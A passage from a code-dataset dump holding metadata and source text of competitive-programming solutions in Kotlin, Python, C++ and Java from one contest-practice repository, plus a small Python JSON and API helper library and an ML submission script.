max(0, int(math.sqrt(d)) - 1)\n while sk ** 2 < d: sk += 1\n if sk ** 2 == d:\n a = 2 * (m + D) + sk\n if a % 4 == 0:\n a //= 4\n b = s + x - a\n print('Possible')\n print(i + 1, a, b)\n sys.exit()\n\nprint('Impossible')\n" }, { "alpha_fraction": 0.4803706705570221, "alphanum_fraction": 0.49267059564590454, "avg_line_length": 26.604650497436523, "blob_id": "0728f82a3d02533e174c8f1fcc475d71e9560840", "content_id": "71878f33475d75a1f224925402724f7591c43c89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 5935, "license_type": "no_license", "max_line_length": 118, "num_lines": 215, "path": "/CodeForce/1570/H.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.PrintWriter// {{{\nimport java.util.*\nimport kotlin.collections.*// }}}\n\nconst val MOD = 998244353\n\nclass Modular(var value: Int) {\n init {\n if ((value > MOD) or (value < -MOD))\n value %= MOD\n if (value < 0)\n value += MOD\n }\n\n constructor(other: Modular): this(other.value) {}\n\n constructor(num: Int, den: Int) : this(0) {\n var xor = Modular(den).xor(MOD - 2)\n xor *= Modular(num)\n value = xor.value\n }\n\n fun xor(deg: Int): Modular {\n var copy = Modular(value)\n var a = Modular(this.value)\n var n = deg - 1\n while (n > 0) {\n if ((n and 1) == 1)\n copy *= a\n a *= a\n n = n shr 1\n }\n return copy\n }\n\n operator fun div(t: Int): Modular = Modular(value) * Modular(t).inverse()\n operator fun plus(t: Int): Modular = Modular(value + t)\n operator fun minus(t: Int): Modular = Modular(value - t)\n operator fun times(t: Int): Modular = Modular(((value * 1L * t) % MOD).toInt())\n\n operator fun div(t: Modular): Modular = Modular(value) * t.inverse()\n operator fun plus(t: Modular): Modular = Modular(value + t.value)\n operator fun minus(t: Modular): Modular = Modular(value - t.value)\n operator fun times(t: Modular): Modular = Modular(((value * 1L * t.value) % MOD).toInt())\n\n fun inverse(): Modular {\n return Modular(1, value)\n }\n\n override fun equals(other: Any?): Boolean = if (other is Modular)\n value == other.value\n else\n false\n\n override fun hashCode(): Int {\n return value\n }\n\n override fun toString(): String {\n return value.toString()\n }\n}\n\nclass Matrix(var n: Int, var value: Array<IntArray>) {\n fun inc(i: Int, j: Int) {\n value[i][j]++\n }\n\n constructor(n: Int): this(n, Array(n) { IntArray(n) {0} }) {\n }\n\n fun xor(deg: Int): Matrix {\n var copy = Matrix(n, value)\n var a = Matrix(n, value)\n var n = deg - 1\n while (n > 0) {\n if ((n and 1) == 1)\n copy *= a\n a *= a\n n = n shr 1\n }\n return copy\n }\n\n operator fun times(other: Matrix): Matrix {\n val ret = Matrix(n)\n for (i in 0 until n)\n for (j in 0 until n)\n for (k in 0 until n)\n ret.value[i][j] = (ret.value[i][j] + ((value[i][k] * 1L * other.value[k][j]) % MOD).toInt()) % MOD\n return ret\n }\n}\n\nclass Trie {\n var array: ArrayList<IntArray> = arrayListOf(IntArray(26) {-1})\n var term: ArrayList<Boolean> = arrayListOf(false)\n\n operator fun plus(s: String): Trie {\n var root = 0\n for (c in s) {\n val u = c.toInt() - 'a'.toInt()\n if (array[root][u] == -1) {\n array[root][u] = array.size\n array.add(IntArray(26) {-1})\n term.add(false)\n }\n root = array[root][u]\n }\n term[root] = true\n return this\n }\n\n}\n\nprivate fun run() {\n val (n, m) = readln()\n val ss = Array(n) { readLine()!! }\n var trie = Trie()\n ss.forEach { trie += it }\n var init = Matrix(162)\n\n val q = LinkedList<Pair<Int, Int>>()\n val num = HashMap<Pair<Int, Int>, Int>()\n fun get(U: Int, V: Int): Int {\n var u = U\n var v = V\n if (u > v) {\n val t = u\n u = v\n v = t\n }\n val key = Pair(u, v)\n if (!num.containsKey(key)) {\n val value = num.size\n num[key] = value\n q.push(key)\n }\n return num[key]!!\n }\n\n val start = Pair(0, 0)\n q.add(start)\n num[start] = 0\n while (!q.isEmpty()) {\n val (u, v) = q.removeFirst()\n val x = get(u, v)\n for (i in 0..25) {\n val tou = trie.array[u][i]\n val tov = trie.array[v][i]\n if (tou == -1 || tov == -1)\n continue\n init.inc(x, get(tou, tov))\n if (trie.term[tou]) init.inc(x, get(0, tov))\n if (trie.term[tov]) init.inc(x, get(tou, 0))\n if (trie.term[tou] && trie.term[tov]) init.inc(x, get(0, 0))\n }\n }\n\n init = init.xor(m)\n writeln(init.value[0][0])\n// writeln(init.value.map { it.joinToString(\" \") }.joinToString(\"\\n\"))\n}\n\nprivate fun PrintWriter.readSolveWrite() {\n run()\n}\n\nprivate fun ok(x: Boolean) = if (x) 1 else 0// {{{\n\nprivate fun writeln(vararg strings: Any) =\n println(strings.map { if (it is IntArray) it.joinToString(\" \") else it }.joinToString(\" \"))\n\nprivate fun readln() = getIntArray()\n\nprivate fun getIntArray() = readLine()!!.splitToIntArray()\n\nprivate fun bufferOut(block: PrintWriter.() -> Unit) = PrintWriter(System.out).use { block(it) }\n\nfun main() = bufferOut { readSolveWrite() }\n\nprivate fun String.splitToIntArray(): IntArray {\n val n = length\n if (n == 0) return IntArray(0) // EMPTY\n var res = IntArray(4)\n var m = 0\n var i = 0\n while (true) {\n var cur = 0\n var neg = false\n var c = get(i) // expecting number, IOOB if there is no number\n if (c == '-') {\n neg = true\n i++\n c = get(i) // expecting number, IOOB if there is no number\n }\n while (true) {\n val d = c.toInt() - '0'.toInt()\n require(d in 0..9) { \"Unexpected character '$c' at $i\" }\n require(cur >= Integer.MIN_VALUE / 10) { \"Overflow at $i\" }\n cur = cur * 10 - d\n require(cur <= 0) { \"Overflow at $i\" }\n i++\n if (i >= n) break\n c = get(i)\n if (c == ' ') break\n }\n if (m >= res.size) res = res.copyOf(res.size * 2)\n res[m++] = if (neg) cur else (-cur).also { require(it >= 0) { \"Overflow at $i\" } }\n if (i >= n) break\n i++\n }\n if (m < res.size) res = res.copyOf(m)\n return res\n}// }}}\n" }, { "alpha_fraction": 0.48329049348831177, "alphanum_fraction": 0.5038560628890991, "avg_line_length": 15.913043022155762, "blob_id": "e8938a0b222b2b61f3acfe90654696c4efe21df7", "content_id": "9e618e90d57a01b93054ee073740ae18eb7e88d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 389, "license_type": "no_license", "max_line_length": 31, "num_lines": 23, "path": "/trains/neerc/neerc.ifmo.ru.train.2016.09.20/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "task = 'elephant'\nf = open(task + '.in', 'r')\ncounts = {}\nn = 0\nfac = [1]\nstrings = f.readlines()\nfor s in strings:\n n += 1\n fac.append(fac[-1] * n)\n s = s[:-1]\n if not s in counts:\n counts[s] = 1\n else:\n counts[s] += 1\n\nans = fac[-1]\nfor x in counts:\n ans = ans // fac[counts[x]]\n\ng = open(task + '.out', 'w')\ng.write(strings[ans % n])\ng.close()\nf.close()\n" }, { "alpha_fraction": 0.34703195095062256, "alphanum_fraction": 0.3942161202430725, "avg_line_length": 28.863636016845703, "blob_id": "7b1145f16c3f4074f04bc544dff0f372a8b3b5a7", "content_id": "ff245f9e2c8b523ff53d1752567a15ea08e5a929", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 657, "license_type": "no_license", "max_line_length": 80, "num_lines": 22, "path": "/CodeForce/0639/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\nusing namespace std;\n\nint main()\n{\n ios_base::sync_with_stdio(false);\n int n, k, i, j, ans = 0;\n cin >> n >> k;\n vector<long long> a(n + 1), suf(n + 1, 0), pref(n + 1, 0);\n for (int q = 0; q <= n; ++q)\n cin >> a[q];\n for (i = 0; ((pref[i] + a[i]) % 2 == 0) && i < n; ++i)\n pref[i + 1] = (pref[i] + a[i]) / 2;\n for (j = n; (abs(suf[j] + a[j]) * 2 < 1000000000000ll) && j > 0; --j)\n suf[j - 1] = (suf[j] + a[j]) * 2;\n for (int q = j; q <= i; ++q)\n if (abs(pref[q] + suf[q]) <= k && ((pref[q] + suf[q] != 0) || (q != n)))\n ans++;\n cout << ans << \"\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.4647814929485321, "alphanum_fraction": 0.47814908623695374, "avg_line_length": 35.69811248779297, "blob_id": "30fa31bf15bd4d09b0676797426b081ccf3e7dba", "content_id": "899575fff2d4a005e1b4a1f65e8fee135ff59b0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1945, "license_type": "no_license", "max_line_length": 928, "num_lines": 53, "path": "/CodeForce/0306/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nint mn = INF, mx = 0;\nvector<int> a(1001);\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nbool readl(vector<int> &a, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n a[i] = x;\n }\n return true;\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n // freopen(\"input.txt\", \"r\", stdin);\n//freopen(\"output.txt\", \"w+\", stdout);\n int n, m;\n readln(n, m);\n if (n % m == 0)\n {\n int t = n / m;\n for (int i = 0; i < m; i++)\n printf(\"%d%c\", t, i == m - 1 ? '\\n' : ' ');\n return 0;\n }\n int t = n / m;\n int f = n % m;\n for (int i = 0; i < m - f; i++)\n printf(\"%d \", t);\n for (int i = m - f; i < m; i++)\n printf(\"%d%c\", t + 1, i == m - 1 ? '\\n' : ' ');\n return 0;\n}\n" }, { "alpha_fraction": 0.4562469720840454, "alphanum_fraction": 0.4674282968044281, "avg_line_length": 17.14418601989746, "blob_id": "b5344e3b30c3a63b30454648533de771380131df", "content_id": "f65a82053c45c1a5be349bfe0914f9e273f2ef36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4114, "license_type": "no_license", "max_line_length": 75, "num_lines": 215, "path": "/trains/opencupSpb/D.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.*;\r\nimport java.util.*;\r\nimport java.math.BigInteger;\r\nimport java.util.Map.Entry;\r\n\r\nimport static java.lang.Math.*;\r\n\r\npublic class D extends PrintWriter {\r\n\r\n\tprivate static final String input = null;\r\n\tprivate static final String output = null;\r\n\r\n\tvoid run() {\r\n\t\tint n = nextInt(), m = 1_000_000 + 1;\r\n\r\n\t\tint l = -1, r = -1;\r\n\r\n\t\tint[] d = nextArray(n);\r\n\r\n\t\tint[] p = new int[m];\r\n\t\tfor (int i = 0; i < m; i++) {\r\n\t\t\tp[i] = i;\r\n\t\t}\r\n\r\n\t\tfor (int i = 2; i < m; i++) {\r\n\t\t\tif (p[i] == i) {\r\n\t\t\t\tfor (int j = 2 * i; j < m; j += i) {\r\n\t\t\t\t\tp[j] = min(i, p[j]);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tint[] size = new int[m];\r\n\t\tint[][] v = new int[m][];\r\n\r\n\t\tfor (int i = 0; i < n; i++) {\r\n\t\t\tint cur = d[i];\r\n\r\n\t\t\twhile (cur > 1) {\r\n\t\t\t\tint prime = p[cur];\r\n\t\t\t\twhile (cur % prime == 0) {\r\n\t\t\t\t\tcur /= prime;\r\n\t\t\t\t}\r\n\r\n\t\t\t\tv[prime] = set(v[prime], size[prime]++, i);\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tfor (int i = 0; i < m; i++) {\r\n\t\t\tfinal int k = size[i];\r\n\r\n\t\t\tif (k > 0) {\r\n\t\t\t\tif (k == 1) {\r\n\t\t\t\t\tif (l == r) {\r\n\t\t\t\t\t\tl = r = v[i][0];\r\n\t\t\t\t\t}\r\n\t\t\t\t} else {\r\n\t\t\t\t\tint[] val = new int[k];\r\n\r\n\t\t\t\t\tfor (int j = 0; j < k; j++) {\r\n\t\t\t\t\t\tval[j] = v[i][j] - 2 * j;\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\tint[] min = new int[k];\r\n\r\n\t\t\t\t\tmin[k - 1] = val[k - 1];\r\n\r\n\t\t\t\t\tfor (int j = k - 2; j >= 0; j--) {\r\n\t\t\t\t\t\tmin[j] = min(val[j], min[j + 1]);\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\tfor (int j = 0; j < k; j++) {\r\n\t\t\t\t\t\tint x = j, y = k - 1;\r\n\t\t\t\t\t\tint f = val[j] + 1;\r\n\r\n\t\t\t\t\t\twhile (y - x > 1) {\r\n\t\t\t\t\t\t\tint z = (x + y) / 2;\r\n\t\t\t\t\t\t\tif (f <= min[z]) {\r\n\t\t\t\t\t\t\t\ty = z;\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\tx = z;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\r\n\t\t\t\t\t\ty = max(x - 1, j);\r\n\t\t\t\t\t\twhile ((y + 1) < k && val[y + 1] <= f) {\r\n\t\t\t\t\t\t\t++y;\r\n\t\t\t\t\t\t}\r\n\r\n\t\t\t\t\t\tx = j;\r\n\r\n\t\t\t\t\t\tint w = val[x] - val[y] + 1;\r\n\t\t\t\t\t\tint fr = v[i][x];\r\n\t\t\t\t\t\tint to = v[i][y];\r\n\r\n\t\t\t\t\t\tint la = min(w, fr);\r\n\t\t\t\t\t\tw -= la;\r\n\t\t\t\t\t\tfr -= la;\r\n\r\n\t\t\t\t\t\tint ra = min(w, n - 1 - to);\r\n\t\t\t\t\t\tw -= ra;\r\n\t\t\t\t\t\tto += ra;\r\n\r\n\t\t\t\t\t\tif (to - fr > r - l) {\r\n\t\t\t\t\t\t\tl = fr;\r\n\t\t\t\t\t\t\tr = to;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tprintln((l + 1) + \" \" + (r + 1));\r\n\r\n\t}\r\n\r\n\tint[] set(int[] vector, int index, int val) {\r\n\t\tif (vector == null) {\r\n\t\t\tvector = new int[index + 8];\r\n\t\t}\r\n\t\tif (index < vector.length) {\r\n\t\t\tvector[index] = val;\r\n\t\t\treturn vector;\r\n\t\t} else {\r\n\t\t\tint[] victor = Arrays.copyOf(vector, max(index + 1, vector.length * 2));\r\n\t\t\tvictor[index] = val;\r\n\t\t\treturn victor;\r\n\t\t}\r\n\t}\r\n\r\n\tlong gcd(long a, long b) {\r\n\t\treturn b == 0 ? a : gcd(b, a % b);\r\n\t}\r\n\r\n\tint[][] nextMatrix(int n, int m) {\r\n\t\tint[][] matrix = new int[n][m];\r\n\t\tfor (int i = 0; i < n; i++)\r\n\t\t\tfor (int j = 0; j < m; j++)\r\n\t\t\t\tmatrix[i][j] = nextInt();\r\n\t\treturn matrix;\r\n\t}\r\n\r\n\tString next() {\r\n\t\twhile (!tokenizer.hasMoreTokens())\r\n\t\t\ttokenizer = new StringTokenizer(nextLine());\r\n\t\treturn tokenizer.nextToken();\r\n\t}\r\n\r\n\tboolean hasNext() {\r\n\t\twhile (!tokenizer.hasMoreTokens()) {\r\n\t\t\tString line = nextLine();\r\n\t\t\tif (line == null) {\r\n\t\t\t\treturn false;\r\n\t\t\t}\r\n\t\t\ttokenizer = new StringTokenizer(line);\r\n\t\t}\r\n\t\treturn true;\r\n\t}\r\n\r\n\tint[] nextArray(int n) {\r\n\t\tint[] array = new int[n];\r\n\t\tfor (int i = 0; i < n; i++) {\r\n\t\t\tarray[i] = nextInt();\r\n\t\t}\r\n\t\treturn array;\r\n\t}\r\n\r\n\tint nextInt() {\r\n\t\treturn Integer.parseInt(next());\r\n\t}\r\n\r\n\tlong nextLong() {\r\n\t\treturn Long.parseLong(next());\r\n\t}\r\n\r\n\tdouble nextDouble() {\r\n\t\treturn Double.parseDouble(next());\r\n\t}\r\n\r\n\tString nextLine() {\r\n\t\ttry {\r\n\t\t\treturn reader.readLine();\r\n\t\t} catch (IOException err) {\r\n\t\t\treturn null;\r\n\t\t}\r\n\t}\r\n\r\n\tpublic D(OutputStream outputStream) {\r\n\t\tsuper(outputStream);\r\n\t}\r\n\r\n\tstatic BufferedReader reader;\r\n\tstatic StringTokenizer tokenizer = new StringTokenizer(\"\");\r\n\tstatic Random rnd = new Random();\r\n\tstatic boolean OJ;\r\n\r\n\tpublic static void main(String[] args) throws IOException {\r\n\t\tD solution;\r\n\t\tif (input == null) {\r\n\t\t\treader = new BufferedReader(new InputStreamReader(System.in));\r\n\t\t} else {\r\n\t\t\treader = new BufferedReader(new FileReader(new File(input)));\r\n\t\t}\r\n\r\n\t\tif (output == null) {\r\n\t\t\tsolution = new D(System.out);\r\n\t\t} else {\r\n\t\t\tsolution = new D(new FileOutputStream(output));\r\n\t\t}\r\n\r\n\t\tsolution.run();\r\n\t\tsolution.close();\r\n\t\treader.close();\r\n\t}\r\n}" }, { "alpha_fraction": 0.620512843132019, "alphanum_fraction": 0.620512843132019, "avg_line_length": 16.636363983154297, "blob_id": "ac1df9f143b9935b83147e86ed3d50383854b1e7", "content_id": "173b2bf9d7569baebe8497d6e80ec33a97deee2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 195, "license_type": "no_license", "max_line_length": 34, "num_lines": 11, "path": "/study/ChatNotDemo/main.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": " #include <QApplication>\n\n #include \"chatdialog.h\"\n\n int main(int argc, char *argv[])\n {\n QApplication app(argc, argv);\n ChatDialog dialog;\n dialog.show();\n return app.exec();\n }\n" }, { "alpha_fraction": 0.4528109133243561, "alphanum_fraction": 0.46678024530410767, "avg_line_length": 26.952381134033203, "blob_id": "bbb421e354149ab1665627bcce7f28c774d7e781", "content_id": "6573bcdb39d6cba2e40d788bd0298ad64cebd9ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2935, "license_type": "no_license", "max_line_length": 131, "num_lines": 105, "path": "/CodeForce/1346/F.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.PrintWriter// {{{\nimport kotlin.math.*\nimport kotlin.collections.*// }}}\n \nfun IntArray.longSum(): Long {\n var sum = 0L\n forEach { sum += it }\n return sum\n}\n\nprivate fun run() {\n val (n, m, q) = readln()\n var a = Array(n){ readln() }\n var total = a.map{ it.longSum() }.sum()\n var r = LongArray(n) {0L}\n var c = LongArray(m) {0L}\n for (i in 0..n - 1)\n for (j in 0..m - 1) {\n r[i] = r[i] + a[i][j]\n c[j] = c[j] + a[i][j]\n }\n\n var res = LongArray(q + 1) {0L}\n for (qq in 0..q) {\n var si = 0\n var sj = 0\n var sum = 0L\n var ans = 0L\n while (2 * (sum + r[si]) < total)\n sum += r[si++]\n sum = 0L\n while (2 * (sum + c[sj]) < total)\n sum += c[sj++]\n for (i in 0..n - 1)\n ans += r[i] * Math.abs(i - si)\n for (j in 0..m - 1)\n ans += c[j] * Math.abs(j - sj)\n res[qq] = ans\n if (qq < q) {\n var (i, j, x) = readln(); --i; --j;\n val delta = x - a[i][j]\n total += delta\n r[i] = r[i] + delta\n c[j] = c[j] + delta\n a[i][j] += delta\n }\n }\n writeln(res.joinToString(\" \"))\n}\n\nprivate fun PrintWriter.readSolveWrite() {\n val t = 1\n for (q in 1..t) {\n run()\n }\n}\n\nprivate fun ok(x: Boolean) = if (x) 1 else 0// {{{\n\nprivate fun writeln(vararg strings: Any) = println(strings.map{if (it is IntArray) it.joinToString(\" \") else it}.joinToString(\" \"))\n\nprivate fun readln() = getIntArray()\n\nprivate fun getIntArray() = readLine()!!.splitToIntArray()\n\nprivate fun bufferOut(block: PrintWriter.() -> Unit) = PrintWriter(System.out).use { block(it) }\n\ndata class Pt(val x: Int, val y: Int, val i: Int, var ans: Int)\n\nfun main() = bufferOut { readSolveWrite() }\n\nprivate fun String.splitToIntArray(): IntArray {\n val n = length\n if (n == 0) return IntArray(0) // EMPTY\n var res = IntArray(4)\n var m = 0\n var i = 0\n while (true) {\n var cur = 0\n var neg = false\n var c = get(i) // expecting number, IOOB if there is no number\n if (c == '-') {\n neg = true\n i++\n c = get(i) // expecting number, IOOB if there is no number\n }\n while (true) {\n val d = c.toInt() - '0'.toInt()\n require(d in 0..9) { \"Unexpected character '$c' at $i\" }\n require(cur >= Integer.MIN_VALUE / 10) { \"Overflow at $i\" }\n cur = cur * 10 - d\n require(cur <= 0) { \"Overflow at $i\" }\n i++\n if (i >= n) break\n c = get(i)\n if (c == ' ') break\n }\n if (m >= res.size) res = res.copyOf(res.size * 2)\n res[m++] = if (neg) cur else (-cur).also { require(it >= 0) { \"Overflow at $i\" } }\n if (i >= n) break\n i++\n }\n if (m < res.size) res = res.copyOf(m)\n return res\n}// }}}\n" }, { "alpha_fraction": 0.6098137497901917, "alphanum_fraction": 0.6127697229385376, "avg_line_length": 30.324073791503906, "blob_id": "0af24e37bc5c6e3485a8aa3a4c08bffaca44be4f", "content_id": "05f9f8355854bbe6304490283e26d3cbc46e3397", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3383, "license_type": "no_license", "max_line_length": 131, "num_lines": 108, "path": "/scripts/library.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import requests\nimport random\nimport json\nimport time\nimport os\nimport datetime\n\nimport click\nimport click_completion\nimport click_completion.core\n\nclick_completion.init()\n\[email protected]()\ndef completion():\n pass\n\[email protected]()\[email protected]('--append/--overwrite', help=\"Append the completion code to the file\", default=None)\[email protected]('shell', required=False, type=click_completion.DocumentedChoice(click_completion.core.shells))\[email protected]('path', required=False)\ndef install(append, shell, path):\n shell, path = click_completion.core.install(shell=shell, path=path, append=append)\n click.echo('%s completion installed in %s' % (shell, path))\n\n\nclass dotdict(dict):\n __getattr__ = dict.get\n __setattr__ = dict.__setitem__\n __delattr__ = dict.__delitem__\n def __init__(self, *args, **kwargs):\n super(dotdict, self).__init__(*args, **kwargs)\n for d in args:\n if isinstance(d, dict):\n for key, value in d.items():\n if isinstance(value, dict):\n value = dotdict(value)\n elif isinstance(value, list) and value and isinstance(value[0], dict):\n value = list(map(dotdict, value))\n self[key] = value\n\n if kwargs:\n for k, v in kwargs.items():\n self[k] = v\n\ndef decorateFunction(original):\n def decorated(*args, **kwargs):\n value = original(*args, **kwargs)\n return dotdict(value) if isinstance(value, dict) else value\n return decorated\n\ndef unlimited(f, field, max_count, verbose = False, count_field = 'count', offset_field = 'offset', starting_offset = 0, **kwargs):\n kwargs[count_field] = max_count\n if not 'max_iterations' in kwargs:\n max_iterations = -1\n else:\n max_iterations = kwargs['max_iterations']\n\n offset = starting_offset\n res = []\n iterations = 0\n while True:\n iterations += 1\n if verbose:\n print(f'Getting {max_count}, offset {offset}')\n kwargs[offset_field] = offset\n temp = f(**kwargs)\n if not field in temp:\n time.sleep(2)\n continue\n temp = temp[field]\n if not temp: break\n\n res += temp\n offset += max_count\n if max_iterations != -1 and iterations >= max_iterations:\n break\n time.sleep(1 / 3)\n return res\n\njson.loads = decorateFunction(json.loads)\nrequests.Response.json = decorateFunction(requests.Response.json)\n\ndef getFilename(filename):\n if filename.startswith('~'):\n filename = os.path.expanduser('~') + filename[1:]\n if not filename.startswith('.') and not filename.startswith('/'):\n filename = './' + filename\n return filename\n\ndef saveJsonInFile(j, filename):\n if type(filename) == str:\n filename = getFilename(filename)\n if not os.path.exists(os.path.dirname(filename)):\n os.makedirs(os.path.dirname(filename))\n filename = open(filename, 'w')\n filename.write(json.dumps(j, ensure_ascii=False))\n filename.close()\n\ndef loadJsonFromFile(filename):\n if type(filename) == str:\n filename = getFilename(filename)\n if not os.path.exists(filename):\n return None\n filename = open(filename, 'r')\n j = json.loads(''.join(filename.readlines()))\n filename.close()\n return j\n" }, { "alpha_fraction": 0.4754098355770111, "alphanum_fraction": 0.49180328845977783, "avg_line_length": 11.199999809265137, "blob_id": "cebcd438294a1d824d4962a7a6ae9fdb3bb874f9", "content_id": "10d2c542102ad0a30d36bf90c46682c6d73c8f1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 61, "license_type": "no_license", "max_line_length": 32, "num_lines": 5, "path": "/CodeForce/0952/F.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import re\n\ns = re.split('([+|-])', input())\n\nprint(ord('2'))\n" }, { "alpha_fraction": 0.3333333432674408, "alphanum_fraction": 0.5, "avg_line_length": 20, "blob_id": "7bbd5af0f6ad73e0a3542f8bffe7bcf76b2f8fd2", "content_id": "f9810cb516ef9092d300267d7fb8d23c13c4f628", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 42, "license_type": "no_license", "max_line_length": 31, "num_lines": 2, "path": "/CodeForce/0934/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n=input()\nprint[-1,n/2*'8'+n%2*'6'][n<37]\n" }, { "alpha_fraction": 0.523809552192688, "alphanum_fraction": 0.5420466065406799, "avg_line_length": 23.370370864868164, "blob_id": "41f2be1f3795edb8489a0900158285639ea4aced", "content_id": "00da5be68b765e7c7fe52db93cc64a2af3bdbb4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1974, "license_type": "no_license", "max_line_length": 65, "num_lines": 81, "path": "/2021/vkcupMl/test.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import math\nimport csv\nfrom tqdm import tqdm\n\nfrom joblib import dump, load\n\nclf = load('filename.joblib2')\nprint(clf.classes_)\n\ntest = './TEST/train.csv'\noutput = './TEST/submit.csv'\n\nfriends = {}\npossible = {}\nanswers = []\n\ndef addFriends(u, v, t):\n if not u in friends:\n friends[u] = {}\n friends[u][v] = t\n\ndef add(u, v, value):\n if value == 0: return\n if not u in possible:\n possible[u] = {}\n if not v in possible[u]:\n possible[u][v] = 0\n possible[u][v] += value\n\nprint('Reading data')\n\nwith open(test, 'r') as csvFile:\n reader = csv.DictReader(csvFile)\n for row in tqdm(reader):\n u = int(row['u'])\n v = int(row['v'])\n t = [int(row['t']), int(row['h'])]\n addFriends(u, v, t)\n addFriends(v, u, t)\n # if len(friends) > 300000:\n # break\n\nprint('Predicting friends')\n\nX = []\nq = []\nfor w, wsFriends in tqdm(friends.items(), total = len(friends)):\n l = len(wsFriends)\n for u, uw in wsFriends.items():\n if u % 8 != 1: continue\n if (100 - uw[0]) * uw[1] / l < 1: continue\n for v, vw in wsFriends.items():\n if v % 2 == 0 or v <= u or v in friends[u]: continue\n if (100 - vw[0]) * vw[1] / l < 1: continue\n X.append([l, *uw, *vw])\n q.append([u, v])\n friends[w] = []\n\ny = clf.predict_proba(X)\nfor i in tqdm(range(len(y))):\n add(q[i][0], q[i][1], y[i][1])\n\nprint('Generating answers')\nfor u, variants in tqdm(possible.items(), total = len(possible)):\n pos = []\n for v, value in variants.items():\n pos.append((value, v))\n\n if len(pos) > 0:\n if len(pos) > 10:\n pos.sort(reverse = True)\n answers.append((u, list(map(lambda p: p[1], pos[:10]))))\n\nanswers.sort()\n\nprint('Writing answers:', len(answers))\nwith open(output, 'w') as submit:\n for row in tqdm(answers, total = len(answers)):\n submit.write(f'{row[0]}: {\",\".join(map(str, row[1]))}\\n')\n\nprint('DONE')\n" }, { "alpha_fraction": 0.4291611611843109, "alphanum_fraction": 0.44848084449768066, "avg_line_length": 29.280000686645508, "blob_id": "b08d03f2e085b032e45dba84d77f69b81a39e6c0", "content_id": "d43e1cbd204eabc507255e329bd2d0bcfe6a7cc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6056, "license_type": "no_license", "max_line_length": 174, "num_lines": 200, "path": "/2021/fbhc2/C2.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef 